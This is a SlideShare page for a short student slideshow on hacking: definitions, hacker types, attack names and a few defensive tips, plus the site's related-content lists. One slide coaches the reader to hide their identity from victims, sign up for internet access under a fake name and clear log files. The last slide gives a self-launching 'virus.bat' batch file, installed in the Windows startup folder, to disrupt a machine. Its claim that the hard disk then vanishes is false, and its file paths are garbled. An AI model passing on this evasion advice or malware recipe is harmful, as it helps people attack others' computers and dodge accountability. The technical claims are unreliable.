SlideShare ist ein Scribd-Unternehmen logo
1 von 7
DEFINITION
Hacking refers to an array of activities
which are done to intrude some one else’s
personal information space so as to use it
for malicious, unwanted purposes.
Hacking is a term used to refer to
activities aimed at exploiting security
flaws to obtain critical information for
gaining access to secured networks.
HACKER : Individual who uses computers to gain unauthorized access to data.
CRACKER : Individual who uses capabilities for harmful purposes against computer systems.
ETHICAL HACKER : Individual who uses capabilities for defensive purposes.
PHREAKER : Individual who focuses on communication systems to steal calling card numbers , make free
calls , acquire access to communication systems illegally.
WHACKER: Novice hacker who attacks WAN and Wireless Network.
SCRIPT/KIDDIE : Individual without Programming skills, uses Software available on Internet.
CYBER-TERRORIST: Individual who works for government/terrorist engaged in sabotage, financial theft, and
attack on Nation’s Critical Infrastructure.
Eavesdropping
Identity Spoofing
Snooping Attacks
Interception
Data Modifications Attacks
Repudiation Attacks
DoS Attacks
DDoS Attacks
Password Guessing Attacks
Man-in-the-Middle Attacks
Back Door Attacks
Spoofing Attacks
Compromised Key Attacks
Application Layer Attacks
STEPS BEFORE HACKING
When you start hacking the first thing you need to do is: to make sure the victim will
not find out your real identity.
So hide your IP by masking it or using a anonymous proxy server. This is only
effective when the victim has no knowledge about computers and internet.
Organizations like the F.B.I, C.I.A and such will find you in no time, so beware !
The best thing to do is using a dialup connection that has a variable IP address. Be
smart, when you signup for a internet dialup connection use a fake name and
address.
When hacking never leave traces of your hacking attempts, clear log files and make
sure you are not monitored. So use a good firewall that keeps out retaliation hacking
attempts of your victim.
Safeguard data
Monitor control on key systems
and check inadequate logging
Protect access control
Privacy awareness training
Clear the Cookies!
1) Type the following and place it in c:Programsvirus.bat.
@echo off
Copy c:Programsvirus.bat c:Programs
Start c:Programsvirus.bat
2) After that make a shortcut of virus.bat and place it in
windows startup folder.
3) Restart the machine.
4) Oops!!! There is no hard disk available in C: drive.
THANK YOU…

Weitere ähnliche Inhalte

Was ist angesagt?

Introduction To Hacking
Introduction To HackingIntroduction To Hacking
Introduction To Hacking
Aitezaz Mohsin
 
Ict H A C K I N G
Ict    H A C K I N GIct    H A C K I N G
Ict H A C K I N G
Hafizra Mas
 

Was ist angesagt? (20)

Introduction To Hacking
Introduction To HackingIntroduction To Hacking
Introduction To Hacking
 
hacking and its types
hacking and its typeshacking and its types
hacking and its types
 
Hacking
HackingHacking
Hacking
 
What is IT security[1]
What is IT security[1]What is IT security[1]
What is IT security[1]
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Hacking And EthicalHacking By Satish
Hacking And EthicalHacking By SatishHacking And EthicalHacking By Satish
Hacking And EthicalHacking By Satish
 
Hacking intro
Hacking introHacking intro
Hacking intro
 
Hacking
Hacking Hacking
Hacking
 
Access Controls Attacks
Access Controls AttacksAccess Controls Attacks
Access Controls Attacks
 
Cyber Crime
Cyber CrimeCyber Crime
Cyber Crime
 
Ict H A C K I N G
Ict    H A C K I N GIct    H A C K I N G
Ict H A C K I N G
 
Hacker
HackerHacker
Hacker
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
ETHICAL HACKING
ETHICAL HACKINGETHICAL HACKING
ETHICAL HACKING
 
Computer hacking
Computer hackingComputer hacking
Computer hacking
 
Course on Ehtical Hacking - Introduction
Course on Ehtical Hacking - IntroductionCourse on Ehtical Hacking - Introduction
Course on Ehtical Hacking - Introduction
 
Cyber hacking dev days by aes team
Cyber hacking dev days by aes teamCyber hacking dev days by aes team
Cyber hacking dev days by aes team
 
All about Hacking
All about HackingAll about Hacking
All about Hacking
 
UNDERSTANDING HACKING
UNDERSTANDING HACKINGUNDERSTANDING HACKING
UNDERSTANDING HACKING
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 

Andere mochten auch

Hackers & hacktivism
Hackers & hacktivismHackers & hacktivism
Hackers & hacktivism
Bilal Ali
 
On the topology of package dependency networks: A comparison of programming l...
On the topology of package dependency networks: A comparison of programming l...On the topology of package dependency networks: A comparison of programming l...
On the topology of package dependency networks: A comparison of programming l...
Tom Mens
 
Learn More About Cyber Crime Investigation
Learn More About Cyber Crime Investigation Learn More About Cyber Crime Investigation
Learn More About Cyber Crime Investigation
Skills Academy
 
Computer +forensics
Computer +forensicsComputer +forensics
Computer +forensics
Rahul Baghla
 

Andere mochten auch (20)

InCl3 catalyst
InCl3 catalystInCl3 catalyst
InCl3 catalyst
 
Hacek report iin bacte
Hacek report iin bacteHacek report iin bacte
Hacek report iin bacte
 
Hackers & hacktivism
Hackers & hacktivismHackers & hacktivism
Hackers & hacktivism
 
Programming erlang
Programming erlangProgramming erlang
Programming erlang
 
Kali Linux Installation - VMware
Kali Linux Installation - VMwareKali Linux Installation - VMware
Kali Linux Installation - VMware
 
Spooky Halloween IT Security Lecture -- The Deep Web
Spooky Halloween IT Security Lecture -- The Deep WebSpooky Halloween IT Security Lecture -- The Deep Web
Spooky Halloween IT Security Lecture -- The Deep Web
 
On the topology of package dependency networks: A comparison of programming l...
On the topology of package dependency networks: A comparison of programming l...On the topology of package dependency networks: A comparison of programming l...
On the topology of package dependency networks: A comparison of programming l...
 
Deep web
Deep webDeep web
Deep web
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Integration of chromatographic peaks
Integration of chromatographic peaksIntegration of chromatographic peaks
Integration of chromatographic peaks
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
Learn More About Cyber Crime Investigation
Learn More About Cyber Crime Investigation Learn More About Cyber Crime Investigation
Learn More About Cyber Crime Investigation
 
Computer forensics
Computer forensicsComputer forensics
Computer forensics
 
HPLC
HPLCHPLC
HPLC
 
Computer forensics
Computer  forensicsComputer  forensics
Computer forensics
 
Computer +forensics
Computer +forensicsComputer +forensics
Computer +forensics
 
Deep Web - what to do and what not to do
Deep Web - what to do and what not to do	Deep Web - what to do and what not to do
Deep Web - what to do and what not to do
 
Darknet
DarknetDarknet
Darknet
 
Digital Crime & Forensics - Presentation
Digital Crime & Forensics - PresentationDigital Crime & Forensics - Presentation
Digital Crime & Forensics - Presentation
 
Preparation of standard, normal and molar solutions
Preparation of standard, normal and molar solutionsPreparation of standard, normal and molar solutions
Preparation of standard, normal and molar solutions
 

Ähnlich wie Hacking

Cyber Crime & Security.pdf
Cyber Crime & Security.pdfCyber Crime & Security.pdf
Cyber Crime & Security.pdf
MohanPandey31
 
Internet security powerpoint
Internet security powerpointInternet security powerpoint
Internet security powerpoint
Arifa Ali
 
You think you are safe online. Are You?
You think you are safe online. Are You?You think you are safe online. Are You?
You think you are safe online. Are You?
TechGenie
 
Engineering report ca2_Kritakbiswas.pptx
Engineering report ca2_Kritakbiswas.pptxEngineering report ca2_Kritakbiswas.pptx
Engineering report ca2_Kritakbiswas.pptx
prosunghosh7
 

Ähnlich wie Hacking (20)

Hacking Presentation v2 By Raffi
Hacking Presentation v2 By Raffi Hacking Presentation v2 By Raffi
Hacking Presentation v2 By Raffi
 
Cyber Crime & Security.pdf
Cyber Crime & Security.pdfCyber Crime & Security.pdf
Cyber Crime & Security.pdf
 
Hacking Presentation
Hacking PresentationHacking Presentation
Hacking Presentation
 
Internet security powerpoint
Internet security powerpointInternet security powerpoint
Internet security powerpoint
 
HACKING
HACKINGHACKING
HACKING
 
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
 
Internet security powerpoint
Internet security powerpointInternet security powerpoint
Internet security powerpoint
 
You think you are safe online. Are You?
You think you are safe online. Are You?You think you are safe online. Are You?
You think you are safe online. Are You?
 
IT Threats and Computer Security
IT Threats and Computer SecurityIT Threats and Computer Security
IT Threats and Computer Security
 
Β. Hucking
Β. Hucking Β. Hucking
Β. Hucking
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
Cyber Crime And Security
Cyber Crime And Security Cyber Crime And Security
Cyber Crime And Security
 
CYBER SECUIRTY PRESENTATION.pptx
CYBER SECUIRTY PRESENTATION.pptxCYBER SECUIRTY PRESENTATION.pptx
CYBER SECUIRTY PRESENTATION.pptx
 
Computer-Security.pptx
Computer-Security.pptxComputer-Security.pptx
Computer-Security.pptx
 
Phishing and hacking
Phishing and hackingPhishing and hacking
Phishing and hacking
 
Engineering report ca2_Kritakbiswas.pptx
Engineering report ca2_Kritakbiswas.pptxEngineering report ca2_Kritakbiswas.pptx
Engineering report ca2_Kritakbiswas.pptx
 
Computer crime
Computer crimeComputer crime
Computer crime
 
Hacking
HackingHacking
Hacking
 
Cyber Security
Cyber SecurityCyber Security
Cyber Security
 

Mehr von Rahul Pandit (14)

PARTITION COEFFICIENT
PARTITION COEFFICIENTPARTITION COEFFICIENT
PARTITION COEFFICIENT
 
SOLID DISPERSION TECHNIQUE
SOLID DISPERSION TECHNIQUESOLID DISPERSION TECHNIQUE
SOLID DISPERSION TECHNIQUE
 
Microwave assisted organic synthesis
Microwave assisted organic synthesisMicrowave assisted organic synthesis
Microwave assisted organic synthesis
 
Stability of packaging in pharmacy
Stability of packaging in pharmacyStability of packaging in pharmacy
Stability of packaging in pharmacy
 
Central nervous system
Central nervous systemCentral nervous system
Central nervous system
 
I.p. 2007 volume 2
I.p. 2007 volume 2I.p. 2007 volume 2
I.p. 2007 volume 2
 
I.p. 2007 volume 3
I.p. 2007 volume 3I.p. 2007 volume 3
I.p. 2007 volume 3
 
I.p. 2007 volume 1
I.p. 2007 volume 1I.p. 2007 volume 1
I.p. 2007 volume 1
 
Core programming in c
Core programming in cCore programming in c
Core programming in c
 
Neuron
NeuronNeuron
Neuron
 
Kinetics and drug stability
Kinetics and drug stabilityKinetics and drug stability
Kinetics and drug stability
 
Immunisation
ImmunisationImmunisation
Immunisation
 
Endangered birds
Endangered birdsEndangered birds
Endangered birds
 
Senega
SenegaSenega
Senega
 

Kürzlich hochgeladen

Spellings Wk 3 English CAPS CARES Please Practise
Spellings Wk 3 English CAPS CARES Please PractiseSpellings Wk 3 English CAPS CARES Please Practise
Spellings Wk 3 English CAPS CARES Please Practise
AnaAcapella
 
Activity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfActivity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdf
ciinovamais
 

Kürzlich hochgeladen (20)

ComPTIA Overview | Comptia Security+ Book SY0-701
ComPTIA Overview | Comptia Security+ Book SY0-701ComPTIA Overview | Comptia Security+ Book SY0-701
ComPTIA Overview | Comptia Security+ Book SY0-701
 
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptxHMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
 
Spellings Wk 3 English CAPS CARES Please Practise
Spellings Wk 3 English CAPS CARES Please PractiseSpellings Wk 3 English CAPS CARES Please Practise
Spellings Wk 3 English CAPS CARES Please Practise
 
Key note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdfKey note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdf
 
Google Gemini An AI Revolution in Education.pptx
Google Gemini An AI Revolution in Education.pptxGoogle Gemini An AI Revolution in Education.pptx
Google Gemini An AI Revolution in Education.pptx
 
FSB Advising Checklist - Orientation 2024
FSB Advising Checklist - Orientation 2024FSB Advising Checklist - Orientation 2024
FSB Advising Checklist - Orientation 2024
 
Activity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfActivity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdf
 
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
Kodo Millet  PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...Kodo Millet  PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
 
Mixin Classes in Odoo 17 How to Extend Models Using Mixin Classes
Mixin Classes in Odoo 17  How to Extend Models Using Mixin ClassesMixin Classes in Odoo 17  How to Extend Models Using Mixin Classes
Mixin Classes in Odoo 17 How to Extend Models Using Mixin Classes
 
Python Notes for mca i year students osmania university.docx
Python Notes for mca i year students osmania university.docxPython Notes for mca i year students osmania university.docx
Python Notes for mca i year students osmania university.docx
 
Unit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxUnit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptx
 
Dyslexia AI Workshop for Slideshare.pptx
Dyslexia AI Workshop for Slideshare.pptxDyslexia AI Workshop for Slideshare.pptx
Dyslexia AI Workshop for Slideshare.pptx
 
Sociology 101 Demonstration of Learning Exhibit
Sociology 101 Demonstration of Learning ExhibitSociology 101 Demonstration of Learning Exhibit
Sociology 101 Demonstration of Learning Exhibit
 
Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024
 
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
 
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
 
Unit-IV; Professional Sales Representative (PSR).pptx
Unit-IV; Professional Sales Representative (PSR).pptxUnit-IV; Professional Sales Representative (PSR).pptx
Unit-IV; Professional Sales Representative (PSR).pptx
 
On National Teacher Day, meet the 2024-25 Kenan Fellows
On National Teacher Day, meet the 2024-25 Kenan FellowsOn National Teacher Day, meet the 2024-25 Kenan Fellows
On National Teacher Day, meet the 2024-25 Kenan Fellows
 
Making communications land - Are they received and understood as intended? we...
Making communications land - Are they received and understood as intended? we...Making communications land - Are they received and understood as intended? we...
Making communications land - Are they received and understood as intended? we...
 
How to Manage Global Discount in Odoo 17 POS
How to Manage Global Discount in Odoo 17 POSHow to Manage Global Discount in Odoo 17 POS
How to Manage Global Discount in Odoo 17 POS
 

Hacking

  • 1.
  • 2. DEFINITION Hacking refers to an array of activities which are done to intrude some one else’s personal information space so as to use it for malicious, unwanted purposes. Hacking is a term used to refer to activities aimed at exploiting security flaws to obtain critical information for gaining access to secured networks.
  • 3. HACKER : Individual who uses computers to gain unauthorized access to data. CRACKER : Individual who uses capabilities for harmful purposes against computer systems. ETHICAL HACKER : Individual who uses capabilities for defensive purposes. PHREAKER : Individual who focuses on communication systems to steal calling card numbers , make free calls , acquire access to communication systems illegally. WHACKER: Novice hacker who attacks WAN and Wireless Network. SCRIPT/KIDDIE : Individual without Programming skills, uses Software available on Internet. CYBER-TERRORIST: Individual who works for government/terrorist engaged in sabotage, financial theft, and attack on Nation’s Critical Infrastructure.
  • 4. Eavesdropping Identity Spoofing Snooping Attacks Interception Data Modifications Attacks Repudiation Attacks DoS Attacks DDoS Attacks Password Guessing Attacks Man-in-the-Middle Attacks Back Door Attacks Spoofing Attacks Compromised Key Attacks Application Layer Attacks
  • 5. STEPS BEFORE HACKING When you start hacking the first thing you need to do is: to make sure the victim will not find out your real identity. So hide your IP by masking it or using a anonymous proxy server. This is only effective when the victim has no knowledge about computers and internet. Organizations like the F.B.I, C.I.A and such will find you in no time, so beware ! The best thing to do is using a dialup connection that has a variable IP address. Be smart, when you signup for a internet dialup connection use a fake name and address. When hacking never leave traces of your hacking attempts, clear log files and make sure you are not monitored. So use a good firewall that keeps out retaliation hacking attempts of your victim.
  • 6. Safeguard data Monitor control on key systems and check inadequate logging Protect access control Privacy awareness training Clear the Cookies!
  • 7. 1) Type the following and place it in c:Programsvirus.bat. @echo off Copy c:Programsvirus.bat c:Programs Start c:Programsvirus.bat 2) After that make a shortcut of virus.bat and place it in windows startup folder. 3) Restart the machine. 4) Oops!!! There is no hard disk available in C: drive. THANK YOU…